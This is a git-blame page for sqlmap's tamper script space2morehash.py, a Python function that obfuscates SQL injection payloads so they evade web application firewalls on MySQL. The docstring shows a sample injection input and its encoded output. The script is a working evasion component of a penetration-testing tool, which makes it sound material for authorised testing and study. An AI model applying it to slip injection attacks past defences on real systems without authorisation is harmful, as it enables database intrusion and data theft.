sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity
a49d685eb8
sqlmap/tamper/space2morehash.py

70 lines
2.1 KiB
Python
Raw Normal View History

Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
#!/usr/bin/env python
"""
updating copyright date
2012-01-11 18:59:46 +04:00
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import random
import string
from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY.LOW
def dependencies():
Added one more tamper script from Roberto Salgado and minor adjustment to others
2011-07-08 17:43:34 +04:00
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
def tamper(payload):
"""
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.41
Notes:
* Useful to bypass several web application firewalls
Added one more tamper script from Roberto Salgado and minor adjustment to others
2011-07-08 17:43:34 +04:00
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
"""
def process(match):
word = match.group('word')
minor refactoring
2011-12-21 18:25:39 +04:00
randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12)))
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
else:
return match.group()
retVal = ""
if payload:
payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload)
for i in xrange(len(payload)):
if payload[i].isspace():
minor refactoring
2011-12-21 18:25:39 +04:00
randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12)))
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
retVal += "%%23%s%%0A" % randomStr
minor fixes pointed by RS
2011-07-11 13:08:24 +04:00
elif payload[i] == '#' or payload[i:i+3] == '-- ':
Minor minor fix
2011-07-11 13:22:47 +04:00
retVal += payload[i:]
minor fixes pointed by RS
2011-07-11 13:08:24 +04:00
break
Added another tamper script from Roberto Salgado
2011-07-08 15:03:14 +04:00
else:
retVal += payload[i]
return retVal
Reference in New Issue Copy Permalink